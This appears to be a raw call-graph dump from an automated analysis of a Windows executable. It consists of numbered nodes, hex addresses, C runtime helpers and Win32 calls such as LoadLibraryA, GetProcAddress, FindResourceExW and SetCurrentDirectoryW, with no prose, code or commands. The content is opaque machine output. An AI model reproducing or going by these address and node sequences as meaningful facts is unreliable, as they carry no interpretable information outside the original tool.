Mailbox 94241->94247 94244 7b6048 94242->94244 94252 7b607e Mailbox 94244->94252 94331 7b61a6 94244->94331 94245 7b61a6 48 API calls 94245->94252 94246 7b614f 94246->94247 94248 7bce19 48 API calls 94246->94248 94247->93979 94250 7b6170 94248->94250 94249 7bce19 48 API calls 94249->94252 94251 7b64cf 48 API calls 94250->94251 94251->94247 94252->94245 94252->94246 94252->94247 94252->94249 94334 7b64cf 94252->94334 94357 7b41a9 94254->94357 94257 7b3a06 94257->93985 94260 822ff0 94262 7d1c9d _free 47 API calls 94260->94262 94263 822ffd 94262->94263 94264 7b4252 84 API calls 94263->94264 94265 823006 94264->94265 94265->94265 94267 7b6ef8 94266->94267 94268 7b622b 94266->94268 94827 7bdd47 48 API calls ___crtGetEnvironmentStringsW 94267->94827 94270 7b9048 94268->94270 94271 7cf4ea 48 API calls 94270->94271 94272 7b6237 94271->94272 94272->93990 94274 7bd6f4 94273->94274 94275 7bd71b 94274->94275 94828 7bd764 55 API calls 94274->94828 94275->93993 94278 7bd654 94277->94278 94285 7bd67e 94277->94285 94279 7bd65b 94278->94279 94280 7bd6c2 94278->94280 94282 7bd666 94279->94282 94286 7bd6ab 94279->94286 94280->94286 94831 7cdce0 53 API calls 94280->94831 94829 7bd9a0 53 API calls __cinit 94282->94829 94285->94001 94286->94285 94830 7cdce0 53 API calls 94286->94830 94288 7b641f 94287->94288 94289 7b6406 94287->94289 94291 7b6a63 48 API calls 94288->94291 94290 7b6eed 48 API calls 94289->94290 94292 7b62d1 94290->94292 94291->94292 94293 7d0fa7 94292->94293 94294 7d1028 94293->94294 94295 7d0fb3 94293->94295 94834 7d103a 59 API calls 4 library calls 94294->94834 94302 7d0fd8 94295->94302 94832 7d7c0e 47 API calls __getptd_noexit 94295->94832 94298 7d1035 94298->94007 94299 7d0fbf 94833 7d6e10 8 API calls ___crtsetenv 94299->94833 94301 7d0fca 94301->94007 94302->94007 94304 7cc064 94303->94304 94306 7cc069 Mailbox 94303->94306 94835 7cc1af 48 API calls 94304->94835 94307 7cc077 94306->94307 94836 7cc15c 48 API calls 94306->94836 94309 7cf4ea 48 API calls 94307->94309 94310 7cc152 94307->94310 94311 7cc108 94309->94311 94310->94038 94312 7cf4ea 48 API calls 94311->94312 94313 7cc113 94312->94313 94313->94038 94313->94313 94315 7c1cf6 94314->94315 94317 7c1ba2 94314->94317 94315->94046 94316 7c1bae 94321 7c1bb9 94316->94321 94838 7cc15c 48 API calls 94316->94838 94317->94316 94319 7cf4ea 48 API calls 94317->94319 94320 8249c4 94319->94320 94323 7cf4ea 48 API calls 94320->94323 94322 7c1c5d 94321->94322 94324 7cf4ea 48 API calls 94321->94324 94322->94046 94329 8249cf 94323->94329 94325 7c1c9f 94324->94325 94326 7c1cb2 94325->94326 94837 7b2925 48 API calls 94325->94837 94326->94046 94328 7cf4ea 48 API calls 94328->94329 94329->94316 94329->94328 94330->94046 94340 7bbdfa 94331->94340 94333 7b61b1 94333->94244 94335 7b651b 94334->94335 94339 7b64dd ___crtGetEnvironmentStringsW 94334->94339 94338 7cf4ea 48 API calls 94335->94338 94336 7cf4ea 48 API calls 94337 7b64e4 94336->94337 94337->94252 94338->94339 94339->94336 94341 7bbe0d 94340->94341 94345 7bbe0a ___crtGetEnvironmentStringsW 94340->94345 94342 7cf4ea 48 API calls 94341->94342 94343 7bbe17 94342->94343 94346 7cee75 94343->94346 94345->94333 94348 7cf4ea __calloc_impl 94346->94348 94347 7d395c _W_store_winword 47 API calls 94347->94348 94348->94347 94349 7cf50c 94348->94349 94350 7cf50e std::exception::exception 94348->94350 94349->94345 94355 7d6805 RaiseException 94350->94355 94352 7cf538 94356 7d673b 47 API calls _free 94352->94356 94354 7cf54a 94354->94345 94355->94352 94356->94354 94422 7b4214 94357->94422 94362 824f73 94365 7b4252 84 API calls 94362->94365 94363 7b41d4 LoadLibraryExW 94432 7b4291 94363->94432 94367 824f7a 94365->94367 94369 7b4291 3 API calls 94367->94369 94371 824f82 94369->94371 94370 7b41fb 94370->94371 94372 7b4207 94370->94372 94458 7b44ed 94371->94458 94374 7b4252 84 API calls 94372->94374 94376 7b39fe 94374->94376 94376->94257 94381 7fc396 94376->94381 94378 824fa9 94466 7b4950 94378->94466 94380 824fb6 94382 7b4517 83 API calls 94381->94382 94383 7fc405 94382->94383 94647 7fc56d 94383->94647 94386 7b44ed 64 API calls 94387 7fc432 94386->94387 94388 7b44ed 64 API calls 94387->94388 94389 7fc442 94388->94389 94390 7b44ed 64 API calls 94389->94390 94391 7fc45d 94390->94391 94392 7b44ed 64 API calls 94391->94392 94393 7fc478 94392->94393 94394 7b4517 83 API calls 94393->94394 94395 7fc48f 94394->94395 94396 7d395c _W_store_winword 47 API calls 94395->94396 94397 7fc496 94396->94397 94398 7d395c _W_store_winword 47 API calls 94397->94398 94399 7fc4a0 94398->94399 94400 7b44ed 64 API calls 94399->94400 94401 7fc4b4 94400->94401 94402 7fbf5a GetSystemTimeAsFileTime 94401->94402 94403 7fc4c7 94402->94403 94404 7fc4dc 94403->94404 94405 7fc4f1 94403->94405 94406 7d1c9d _free 47 API calls 94404->94406 94407 7fc4f7 94405->94407 94408 7fc556 94405->94408 94410 7fc4e2 94406->94410 94653 7fb965 94407->94653 94409 7d1c9d _free 47 API calls 94408->94409 94412 7fc41b 94409->94412 94413 7d1c9d _free 47 API calls 94410->94413 94412->94260 94416 7b4252 94412->94416 94413->94412 94415 7d1c9d _free 47 API calls 94415->94412 94417 7b425c 94416->94417 94419 7b4263 94416->94419 94418 7d35e4 __fcloseall 83 API calls 94417->94418 94418->94419 94420 7b4283 FreeLibrary 94419->94420 94421 7b4272 94419->94421 94420->94421 94421->94260 94471 7b4339 94422->94471 94425 7b423c 94426 7b41bb 94425->94426 94427 7b4244 FreeLibrary 94425->94427 94429 7d3499 94426->94429 94427->94426 94479 7d34ae 94429->94479 94431 7b41c8 94431->94362 94431->94363 94558 7b42e4 94432->94558 94436 7b41ec 94439 7b4380 94436->94439 94437 7b42c1 FreeLibrary 94437->94436 94438 7b42b8 94438->94436 94438->94437 94440 7cf4ea 48 API calls 94439->94440 94441 7b4395 94440->94441 94566 7b47b7 94441->94566 94443 7b43a1 ___crtGetEnvironmentStringsW 94444 7b43dc 94443->94444 94445 7b4499 94443->94445 94446 7b44d1 94443->94446 94447 7b4950 57 API calls 94444->94447 94569 7b406b CreateStreamOnHGlobal 94445->94569 94580 7fc750 93 API calls 94446->94580 94455 7b43e5 94447->94455 94450 7b44ed 64 API calls 94450->94455 94451 7b4479 94451->94370 94453 824ed7 94454 7b4517 83 API calls 94453->94454 94456 824eeb 94454->94456 94455->94450 94455->94451 94455->94453 94575 7b4517 94455->94575 94457 7b44ed 64 API calls 94456->94457 94457->94451 94459 824fc0 94458->94459 94460 7b44ff 94458->94460 94604 7d381e 94460->94604 94463 7fbf5a 94624 7fbdb4 94463->94624 94465 7fbf70 94465->94378 94467 825002 94466->94467 94468 7b495f 94466->94468 94629 7d3e65 94468->94629 94470 7b4967 94470->94380 94475 7b434b 94471->94475 94474 7b4321 LoadLibraryA GetProcAddress 94474->94425 94476 7b422f 94475->94476 94477 7b4354 LoadLibraryA 94475->94477 94476->94425 94476->94474 94477->94476 94478 7b4365 GetProcAddress 94477->94478 94478->94476 94480 7d34ba _doexit 94479->94480 94481 7d34cd 94480->94481 94483 7d34fe 94480->94483 94527 7d7c0e 47 API calls __getptd_noexit 94481->94527 94498 7de4c8 94483->94498 94484 7d34d2 94528 7d6e10 8 API calls ___crtsetenv 94484->94528 94487 7d3503 94488 7d350c 94487->94488 94489 7d3519 94487->94489 94529 7d7c0e 47 API calls __getptd_noexit 94488->94529 94491 7d3543 94489->94491 94492 7d3523 94489->94492 94512 7de5e0 94491->94512 94530 7d7c0e 47 API calls __getptd_noexit 94492->94530 94493 7d34dd _doexit @_EH4_CallFilterFunc@8 94493->94431 94499 7de4d4 _doexit 94498->94499 94500 7d7cf4 __lock 47 API calls 94499->94500 94506 7de4e2 94500->94506 94501 7de559 94537 7d69d0 47 API calls _W_store_winword 94501->94537 94504 7de5cc _doexit 94504->94487 94505 7de560 94507 7de56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94505->94507 94510 7de552 94505->94510 94506->94501 94508 7d7d7c __mtinitlocknum 47 API calls 94506->94508 94506->94510 94535 7d4e5b 48 API calls __lock 94506->94535 94536 7d4ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94506->94536 94507->94510 94508->94506 94532 7de5d7 94510->94532 94513 7de600 __wopenfile 94512->94513 94514 7de61a 94513->94514 94523 7de7d5 94513->94523 94544 7d185b 59 API calls 3 library calls 94513->94544 94542 7d7c0e 47 API calls __getptd_noexit 94514->94542 94516 7de61f 94543 7d6e10 8 API calls ___crtsetenv 94516->94543 94518 7d354e 94531 7d3570 LeaveCriticalSection LeaveCriticalSection _fseek 94518->94531 94519 7de838 94539 7e63c9 94519->94539 94522 7de7ce 94522->94523 94545 7d185b 59 API calls 3 library calls 94522->94545 94523->94514 94523->94519 94525 7de7ed 94525->94523 94546 7d185b 59 API calls 3 library calls 94525->94546 94527->94484 94528->94493 94529->94493 94530->94493 94531->94493 94538 7d7e58 LeaveCriticalSection 94532->94538 94534 7de5de 94534->94504 94535->94506 94536->94506 94537->94505 94538->94534 94547 7e5bb1 94539->94547 94541 7e63e2 94541->94518 94542->94516 94543->94518 94544->94522 94545->94525 94546->94523 94550 7e5bbd _doexit 94547->94550 94548 7e5bcf 94549 7d7c0e __flswbuf 47 API calls 94548->94549 94551 7e5bd4 94549->94551 94550->94548 94552 7e5c06 94550->94552 94553 7d6e10 ___crtsetenv 8 API calls 94551->94553 94554 7e5c78 __wsopen_helper 110 API calls 94552->94554 94557 7e5bde _doexit 94553->94557 94555 7e5c23 94554->94555 94556 7e5c4c __wsopen_helper LeaveCriticalSection 94555->94556 94556->94557 94557->94541 94562 7b42f6 94558->94562 94561 7b42cc LoadLibraryA GetProcAddress 94561->94438 94563 7b42aa 94562->94563 94564 7b42ff LoadLibraryA 94562->94564 94563->94438 94563->94561 94564->94563 94565 7b4310 GetProcAddress 94564->94565 94565->94563 94567 7cf4ea 48 API calls 94566->94567 94568 7b47c9 94567->94568 94568->94443 94570 7b4085 FindResourceExW 94569->94570 94574 7b40a2 94569->94574 94571 824f16 LoadResource 94570->94571 94570->94574 94572 824f2b SizeofResource 94571->94572 94571->94574 94573 824f3f LockResource 94572->94573 94572->94574 94573->94574 94574->94444 94576 7b4526 94575->94576 94579 824fe0 94575->94579 94581 7d3a8d 94576->94581 94578 7b4534 94578->94455 94580->94444 94582 7d3a99 _doexit 94581->94582 94583 7d3aa7 94582->94583 94584 7d3acd 94582->94584 94594 7d7c0e 47 API calls __getptd_noexit 94583->94594 94596 7d4e1c 94584->94596 94587 7d3aac 94595 7d6e10 8 API calls ___crtsetenv 94587->94595 94588 7d3ad3 94602 7d39fe 81 API calls 4 library calls 94588->94602 94591 7d3ae2 94603 7d3b04 LeaveCriticalSection LeaveCriticalSection _fseek 94591->94603 94593 7d3ab7 _doexit 94593->94578 94594->94587 94595->94593 94597 7d4e2c 94596->94597 94598 7d4e4e EnterCriticalSection 94596->94598 94597->94598 94599 7d4e34 94597->94599 94600 7d4e44 94598->94600 94601 7d7cf4 __lock 47 API calls 94599->94601 94600->94588 94601->94600 94602->94591 94603->94593 94607 7d3839 94604->94607 94606 7b4510 94606->94463 94608 7d3845 _doexit 94607->94608 94609 7d3888 94608->94609 94610 7d3880 _doexit 94608->94610 94615 7d385b _memset 94608->94615 94611 7d4e1c __lock_file 48 API calls 94609->94611 94610->94606 94613 7d388e 94611->94613 94622 7d365b 62 API calls 7 library calls 94613->94622 94620 7d7c0e 47 API calls __getptd_noexit 94615->94620 94616 7d3875 94621 7d6e10 8 API calls ___crtsetenv 94616->94621 94617 7d38a4 94623 7d38c2 LeaveCriticalSection LeaveCriticalSection _fseek 94617->94623 94620->94616 94621->94610 94622->94617 94623->94610 94627 7d344a GetSystemTimeAsFileTime 94624->94627 94626 7fbdc3 94626->94465 94628 7d3478 __aulldiv 94627->94628 94628->94626 94630 7d3e71 _doexit 94629->94630 94631 7d3e7f 94630->94631 94632 7d3e94 94630->94632 94643 7d7c0e 47 API calls __getptd_noexit 94631->94643 94634 7d4e1c __lock_file 48 API calls 94632->94634 94636 7d3e9a 94634->94636 94635 7d3e84 94644 7d6e10 8 API calls ___crtsetenv 94635->94644 94645 7d3b0c 55 API calls 6 library calls 94636->94645 94639 7d3ea5 94646 7d3ec5 LeaveCriticalSection LeaveCriticalSection _fseek 94639->94646 94640 7d3e8f _doexit 94640->94470 94642 7d3eb7 94642->94640 94643->94635 94644->94640 94645->94639 94646->94642 94652 7fc581 __tzset_nolock _wcscmp 94647->94652 94648 7b44ed 64 API calls 94648->94652 94649 7fc417 94649->94386 94649->94412 94650 7fbf5a GetSystemTimeAsFileTime 94650->94652 94651 7b4517 83 API calls 94651->94652 94652->94648 94652->94649 94652->94650 94652->94651 94654 7fb97e 94653->94654 94655 7fb970 94653->94655 94657 7fb9c3 94654->94657 94658 7d3499 117 API calls 94654->94658 94679 7fb987 94654->94679 94656 7d3499 117 API calls 94655->94656 94656->94654 94684 7fbbe8 64 API calls 3 library calls 94657->94684 94659 7fb9a8 94658->94659 94659->94657 94661 7fb9b1 94659->94661 94661->94679 94695 7d35e4 94661->94695 94662 7fba07 94663 7fba2c 94662->94663 94664 7fba0b 94662->94664 94685 7fb7e5 47 API calls _W_store_winword 94663->94685 94667 7fba18 94664->94667 94669 7d35e4 __fcloseall 83 API calls 94664->94669 94670 7d35e4 __fcloseall 83 API calls 94667->94670 94667->94679 94668 7fba34 94671 7fba5a 94668->94671 94672 7fba3a 94668->94672 94669->94667 94670->94679 94686 7fba8a 90 API calls 94671->94686 94674 7fba47 94672->94674 94676 7d35e4 __fcloseall 83 API calls 94672->94676 94678 7d35e4 __fcloseall 83 API calls 94674->94678 94674->94679 94675 7fba61 94687 7fbb64 94675->94687 94676->94674 94678->94679 94679->94415 94681 7fba75 94681->94679 94683 7d35e4 __fcloseall 83 API calls 94681->94683 94682 7d35e4 __fcloseall 83 API calls 94682->94681 94683->94679 94684->94662 94685->94668 94686->94675 94688 7fbb77 94687->94688 94689 7fbb71 94687->94689 94691 7fbb88 94688->94691 94693 7d1c9d _free 47 API calls 94688->94693 94690 7d1c9d _free 47 API calls 94689->94690 94690->94688 94692 7fba68 94691->94692 94694 7d1c9d _free 47 API calls 94691->94694 94692->94681 94692->94682 94693->94691 94694->94692 94696 7d35f0 _doexit 94695->94696 94697 7d361c 94696->94697 94698 7d3604 94696->94698 94701 7d4e1c __lock_file 48 API calls 94697->94701 94703 7d3614 _doexit 94697->94703 94724 7d7c0e 47 API calls __getptd_noexit 94698->94724 94700 7d3609 94725 7d6e10 8 API calls ___crtsetenv 94700->94725 94704 7d362e 94701->94704 94703->94679 94708 7d3578 94704->94708 94709 7d359b 94708->94709 94710 7d3587 94708->94710 94717 7d3597 94709->94717 94727 7d2c84 94709->94727 94767 7d7c0e 47 API calls __getptd_noexit 94710->94767 94713 7d358c 94768 7d6e10 8 API calls ___crtsetenv 94713->94768 94726 7d3653 LeaveCriticalSection LeaveCriticalSection _fseek 94717->94726 94720 7d35b5 94744 7de9d2 94720->94744 94722 7d35bb 94722->94717 94723 7d1c9d _free 47 API calls 94722->94723 94723->94717 94724->94700 94725->94703 94726->94703 94728 7d2cbb 94727->94728 94729 7d2c97 94727->94729 94733 7deb36 94728->94733 94729->94728 94730 7d2933 __fputwc_nolock 47 API calls 94729->94730 94731 7d2cb4 94730->94731 94769 7daf61 94731->94769 94734 7d35af 94733->94734 94735 7deb43 94733->94735 94737 7d2933 94734->94737 94735->94734 94736 7d1c9d _free 47 API calls 94735->94736 94736->94734 94738 7d293d 94737->94738 94739 7d2952 94737->94739 94794 7d7c0e 47 API calls __getptd_noexit 94738->94794 94739->94720 94741 7d2942 94795 7d6e10 8 API calls ___crtsetenv 94741->94795 94743 7d294d 94743->94720 94745 7de9de _doexit 94744->94745 94746 7de9fe 94745->94746 94747 7de9e6 94745->94747 94749 7dea7b 94746->94749 94754 7dea28 94746->94754 94820 7d7bda 47 API calls __getptd_noexit 94747->94820 94824 7d7bda 47 API calls __getptd_noexit 94749->94824 94750 7de9eb 94821 7d7c0e 47 API calls __getptd_noexit 94750->94821 94753 7dea80 94825 7d7c0e 47 API calls __getptd_noexit 94753->94825 94796 7da8ed 94754->94796 94755 7de9f3 _doexit 94755->94722 94758 7dea88 94826 7d6e10 8 API calls ___crtsetenv 94758->94826 94759 7dea2e 94761 7dea4c 94759->94761 94762 7dea41 94759->94762 94822 7d7c0e 47 API calls __getptd_noexit 94761->94822 94805 7dea9c 94762->94805 94765 7dea47 94823 7dea73 LeaveCriticalSection __unlock_fhandle 94765->94823 94767->94713 94768->94717 94770 7daf6d _doexit 94769->94770 94771 7daf8d 94770->94771 94772 7daf75 94770->94772 94773 7db022 94771->94773 94778 7dafbf 94771->94778 94774 7d7bda __dosmaperr 47 API calls 94772->94774 94775 7d7bda __dosmaperr 47 API calls 94773->94775 94776 7daf7a 94774->94776 94779 7db027 94775->94779 94777 7d7c0e __flswbuf 47 API calls 94776->94777 94788 7daf82 _doexit 94777->94788 94780 7da8ed ___lock_fhandle 49 API calls 94778->94780 94781 7d7c0e __flswbuf 47 API calls 94779->94781 94782 7dafc5 94780->94782 94783 7db02f 94781->94783 94784 7dafd8 94782->94784 94785 7dafeb 94782->94785 94786 7d6e10 ___crtsetenv 8 API calls 94783->94786 94787 7db043 __chsize_nolock 75 API calls 94784->94787 94789 7d7c0e __flswbuf 47 API calls 94785->94789 94786->94788 94790 7dafe4 94787->94790 94788->94728 94791 7daff0 94789->94791 94793 7db01a __flswbuf LeaveCriticalSection 94790->94793 94792 7d7bda __dosmaperr 47 API calls 94791->94792 94792->94790 94793->94788 94794->94741 94795->94743 94797 7da8f9 _doexit 94796->94797 94798 7da946 EnterCriticalSection 94797->94798 94800 7d7cf4 __lock 47 API calls 94797->94800 94799 7da96c _doexit 94798->94799 94799->94759 94801 7da91d 94800->94801 94802 7da928 InitializeCriticalSectionAndSpinCount 94801->94802 94803 7da93a 94801->94803 94802->94803 94804 7da970 ___lock_fhandle LeaveCriticalSection 94803->94804 94804->94798 94806 7daba4 __lseek_nolock 47 API calls 94805->94806 94808 7deaaa 94806->94808 94807 7deb00 94809 7dab1e __free_osfhnd 48 API calls 94807->94809 94808->94807 94810 7deade 94808->94810 94813 7daba4 __lseek_nolock 47 API calls 94808->94813 94812 7deb08 94809->94812 94810->94807 94811 7daba4 __lseek_nolock 47 API calls 94810->94811 94814 7deaea CloseHandle 94811->94814 94815 7deb2a 94812->94815 94819 7d7bed __dosmaperr 47 API calls 94812->94819 94816 7dead5 94813->94816 94814->94807 94818 7deaf6 GetLastError 94814->94818 94815->94765 94817 7daba4 __lseek_nolock 47 API calls 94816->94817 94817->94810 94818->94807 94819->94815 94820->94750 94821->94755 94822->94765 94823->94755 94824->94753 94825->94758 94826->94755 94827->94268 94828->94275 94829->94285 94830->94285 94831->94286 94832->94299 94833->94301 94834->94298 94835->94306 94836->94307 94837->94326 94838->94321 94898 7df8a0 94839->94898 94842 7b6a63 48 API calls 94843 7b6643 94842->94843 94900 7b6571 94843->94900 94846 7b40a7 94847 7df8a0 __ftell_nolock 94846->94847 94848 7b40b4 GetLongPathNameW 94847->94848 94849 7b6a63 48 API calls 94848->94849 94850 7b40dc 94849->94850 94851 7b49a0 94850->94851 94852 7bd7f7 48 API calls 94851->94852 94853 7b49b2 94852->94853 94854 7b660f 49 API calls 94853->94854 94855 7b49bd 94854->94855 94856 7b49c8 94855->94856 94861 822e35 94855->94861 94858 7b64cf 48 API calls 94856->94858 94859 7b49d4 94858->94859 94908 7b28a6 94859->94908 94860 822e4f 94861->94860 94914 7cd35e 60 API calls 94861->94914 94863 7b49e7 Mailbox 94863->94062 94865 7b41a9 136 API calls 94864->94865 94866 7b415e 94865->94866 94867 823489 94866->94867 94868 7b41a9 136 API calls 94866->94868 94869 7fc396 122 API calls 94867->94869 94870 7b4172 94868->94870 94871 82349e 94869->94871 94870->94867 94872 7b417a 94870->94872 94873 8234a2 94871->94873 94874 8234bf 94871->94874 94876 8234aa 94872->94876 94877 7b4186 94872->94877 94878 7b4252 84 API calls 94873->94878 94875 7cf4ea 48 API calls 94874->94875 94889 823504 Mailbox 94875->94889 95003 7f6b49 87 API calls _wprintf 94876->95003 94915 7bc833 94877->94915 94878->94876 94881 8234b8 94881->94874 94883 8236b4 94884 7d1c9d _free 47 API calls 94883->94884 94885 8236bc 94884->94885 94886 7b4252 84 API calls 94885->94886 94892 8236c5 94886->94892 94889->94883 94889->94892 94895 7bce19 48 API calls 94889->94895 95004 7f2551 48 API calls ___crtGetEnvironmentStringsW 94889->95004 95005 7f2472 60 API calls 2 library calls 94889->95005 95006 7f9c12 48 API calls 94889->95006 95007 7bba85 48 API calls ___crtGetEnvironmentStringsW 94889->95007 95008 7b4dd9 48 API calls 94889->95008 94891 7d1c9d _free 47 API calls 94891->94892 94892->94891 94894 7b4252 84 API calls 94892->94894 95009 7f25b5 86 API calls 4 library calls 94892->95009 94894->94892 94895->94889 94899 7b661c GetFullPathNameW 94898->94899 94899->94842 94901 7b657f 94900->94901 94904 7bb18b 94901->94904 94903 7b4114 94903->94846 94905 7bb199 94904->94905 94907 7bb1a2 ___crtGetEnvironmentStringsW 94904->94907 94906 7bbdfa 48 API calls 94905->94906 94905->94907 94906->94907 94907->94903 94909 7b28b8 94908->94909 94913 7b28d7 ___crtGetEnvironmentStringsW 94908->94913 94912 7cf4ea 48 API calls 94909->94912 94910 7cf4ea 48 API calls 94911 7b28ee 94910->94911 94911->94863 94912->94913 94913->94910 94914->94861 94916 7bc843 __ftell_nolock 94915->94916 94917 823095 94916->94917 94918 7bc860 94916->94918 95034 7f25b5 86 API calls 4 library calls 94917->95034 95015 7b48ba 49 API calls 94918->95015 94921 7bc882 95016 7b4550 56 API calls 94921->95016 94922 8230a8 95035 7f25b5 86 API calls 4 library calls 94922->95035 94924 7bc897 94924->94922 94925 7bc89f 94924->94925 94928 7bd7f7 48 API calls 94925->94928 94927 8230c4 94930 7bc90c 94927->94930 94929 7bc8ab 94928->94929 95017 7ce968 49 API calls __ftell_nolock 94929->95017 94932 7bc91a 94930->94932 94933 8230d7 94930->94933 95020 7d1dfc 94932->95020 94936 7b4907 CloseHandle 94933->94936 94934 7bc8b7 94937 7bd7f7 48 API calls 94934->94937 94938 8230e3 94936->94938 94939 7bc8c3 94937->94939 94940 7b41a9 136 API calls 94938->94940 94941 7b660f 49 API calls 94939->94941 94942 82310d 94940->94942 94943 7bc8d1 94941->94943 94945 823136 94942->94945 94948 7fc396 122 API calls 94942->94948 95018 7ceb66 SetFilePointerEx ReadFile 94943->95018 94944 7bc943 _wcscat _wcscpy 94947 7bc96d SetCurrentDirectoryW 94944->94947 95036 7f25b5 86 API calls 4 library calls 94945->95036 94951 7cf4ea 48 API calls 94947->94951 94952 823129 94948->94952 94949 7bc8fd 95019 7b46ce SetFilePointerEx SetFilePointerEx 94949->95019 94955 7bc988 94951->94955 94956 823152 94952->94956 94957 823131 94952->94957 94954 82314d 94986 7bcad1 Mailbox 94954->94986 94959 7b47b7 48 API calls 94955->94959 94958 7b4252 84 API calls 94956->94958 94960 7b4252 84 API calls 94957->94960 94961 823157 94958->94961 94990 7bc993 Mailbox __wsetenvp 94959->94990 94960->94945 94962 7cf4ea 48 API calls 94961->94962 94969 823194 94962->94969 94963 7bca9d 95030 7b4907 94963->95030 94967 7b3d98 94967->93931 94967->93954 94968 7bcaa9 SetCurrentDirectoryW 94968->94986 95037 7bba85 48 API calls ___crtGetEnvironmentStringsW 94969->95037 94973 8233ce 95043 7f9b72 48 API calls 94973->95043 94974 823467 95047 7f25b5 86 API calls 4 library calls 94974->95047 94977 823480 94977->94963 94979 8233f0 95044 8129e8 48 API calls ___crtGetEnvironmentStringsW 94979->95044 94981 8233fd 94982 7d1c9d _free 47 API calls 94981->94982 94982->94986 94984 82345f 95046 7f240b 48 API calls 3 library calls 94984->95046 95010 7b48dd 94986->95010 94987 7bce19 48 API calls 94987->94990 94990->94963 94990->94974 94990->94984 94990->94987 95023 7bb337 56 API calls _wcscpy 94990->95023 95024 7cc258 GetStringTypeW 94990->95024 95025 7bcb93 59 API calls __wcsnicmp 94990->95025 95026 7bcb5a GetStringTypeW __wsetenvp 94990->95026 95027 7d16d0 GetStringTypeW __wtof_l 94990->95027 95028 7bcc24 162 API calls 3 library calls 94990->95028 95029 7cc682 48 API calls 94990->95029 94994 7bce19 48 API calls 95000 8231dd Mailbox 94994->95000 94997 823420 95045 7f25b5 86 API calls 4 library calls 94997->95045 94999 823439 95001 7d1c9d _free 47 API calls 94999->95001 95000->94973 95000->94994 95000->94997 95038 7f2551 48 API calls ___crtGetEnvironmentStringsW 95000->95038 95039 7f2472 60 API calls 2 library calls 95000->95039 95040 7f9c12 48 API calls 95000->95040 95041 7bba85 48 API calls ___crtGetEnvironmentStringsW 95000->95041 95042 7cc682 48 API calls 95000->95042 95002 82344c 95001->95002 95002->94986 95003->94881 95004->94889 95005->94889 95006->94889 95007->94889 95008->94889 95009->94892 95011 7b4907 CloseHandle 95010->95011 95012 7b48e5 Mailbox 95011->95012 95013 7b4907 CloseHandle 95012->95013 95014 7b48fc 95013->95014 95014->94967 95015->94921 95016->94924 95017->94934 95018->94949 95019->94930 95048 7d1e46 95020->95048 95023->94990 95024->94990 95025->94990 95026->94990 95027->94990 95028->94990 95029->94990 95031 7b4911 95030->95031 95032 7b4920 95030->95032 95031->94968 95032->95031 95033 7b4925 CloseHandle 95032->95033 95033->95031 95034->94922 95035->94927 95036->94954 95037->95000 95038->95000 95039->95000 95040->95000 95041->95000 95042->95000 95043->94979 95044->94981 95045->94999 95046->94974 95047->94977 95049 7d1e55 95048->95049 95050 7d1e61 95048->95050 95049->95050 95063 7d1ed4 95049->95063 95067 7d9d6b 47 API calls 2 library calls 95049->95067 95072 7d7c0e 47 API calls __getptd_noexit 95050->95072 95052 7d2019 95057 7d1e41 95052->95057 95073 7d6e10 8 API calls ___crtsetenv 95052->95073 95055 7d1fa0 95055->95050 95055->95057 95059 7d1fb0 95055->95059 95056 7d1f5f 95056->95050 95058 7d1f7b 95056->95058 95069 7d9d6b 47 API calls 2 library calls 95056->95069 95057->94944 95058->95050 95058->95057 95062 7d1f91 95058->95062 95071 7d9d6b 47 API calls 2 library calls 95059->95071 95070 7d9d6b 47 API calls 2 library calls 95062->95070 95063->95050 95066 7d1f41 95063->95066 95068 7d9d6b 47 API calls 2 library calls 95063->95068 95066->95055 95066->95056 95067->95063 95068->95066 95069->95058 95070->95057 95071->95057 95072->95052 95073->95057 95075 7cf4ea 48 API calls 95074->95075 95076 7b6b54 95075->95076 95076->94074 95077->94073 95079 7b4c8b 95078->95079 95080 7b4d94 95078->95080 95079->95080 95081 7cf4ea 48 API calls 95079->95081 95080->94079 95082 7b4cb2 95081->95082 95083 7cf4ea 48 API calls 95082->95083 95088 7b4d22 95083->95088 95088->95080 95091 7bb470 95088->95091 95119 7b4dd9 48 API calls 95088->95119 95120 7f9af1 48 API calls 95088->95120 95121 7bba85 48 API calls ___crtGetEnvironmentStringsW 95088->95121 95089->94082 95090->94084 95122 7b6b0f 95091->95122 95093 7bb69b 95134 7bba85 48 API calls ___crtGetEnvironmentStringsW 95093->95134 95096 7bb6b5 Mailbox 95096->95088 95098 7bba85 48 API calls 95114 7bb495 95098->95114 95099 82397b 95138 7f26bc 88 API calls 4 library calls 95099->95138 95102 7bb9e4 95140 7f26bc 88 API calls 4 library calls 95102->95140 95103 823973 95103->95096 95106 7bbcce 48 API calls 95106->95114 95107 823989 95139 7bba85 48 API calls ___crtGetEnvironmentStringsW 95107->95139 95109 823909 95111 7b6b4a 48 API calls 95109->95111 95113 823914 95111->95113 95117 7cf4ea 48 API calls 95113->95117 95114->95093 95114->95098 95114->95099 95114->95102 95114->95106 95114->95109 95115 7bbdfa 48 API calls 95114->95115 95118 823939 ___crtGetEnvironmentStringsW 95114->95118 95127 7bc413 59 API calls 95114->95127 95128 7bbb85 95114->95128 95133 7bbc74 48 API calls 95114->95133 95135 7bc6a5 49 API calls 95114->95135 95136 7bc799 48 API calls ___crtGetEnvironmentStringsW 95114->95136 95116 7bb66c CharUpperBuffW 95115->95116 95116->95114 95117->95118 95137 7f26bc 88 API calls 4 library calls 95118->95137 95119->95088 95120->95088 95121->95088 95123 7cf4ea 48 API calls 95122->95123 95124 7b6b34 95123->95124 95125 7b6b4a 48 API calls 95124->95125 95126 7b6b43 95125->95126 95126->95114 95127->95114 95129 7bbb9b 95128->95129 95132 7bbb96 ___crtGetEnvironmentStringsW 95128->95132 95130 7cee75 48 API calls 95129->95130 95131 821b77 95129->95131 95130->95132 95131->95131 95132->95114 95133->95114 95134->95096 95135->95114 95136->95114 95137->95103 95138->95107 95139->95103 95140->95103 95142 7b403c LoadImageW 95141->95142 95143 82418d EnumResourceNamesW 95141->95143 95144 7b3ee1 RegisterClassExW 95142->95144 95143->95144 95145 7b3f53 7 API calls 95144->95145 95145->94098 95147 823c33 95146->95147 95148 7b4c44 95146->95148 95147->95148 95149 823c3c DestroyIcon 95147->95149 95148->94104 95172 7f5819 61 API calls _W_store_winword 95148->95172 95149->95148 95151 7b51cb 95150->95151 95152 7b52a2 Mailbox 95150->95152 95153 7b6b0f 48 API calls 95151->95153 95152->94109 95154 7b51d9 95153->95154 95155 823ca1 LoadStringW 95154->95155 95156 7b51e6 95154->95156 95159 823cbb 95155->95159 95157 7b6a63 48 API calls 95156->95157 95158 7b51fb 95157->95158 95158->95159 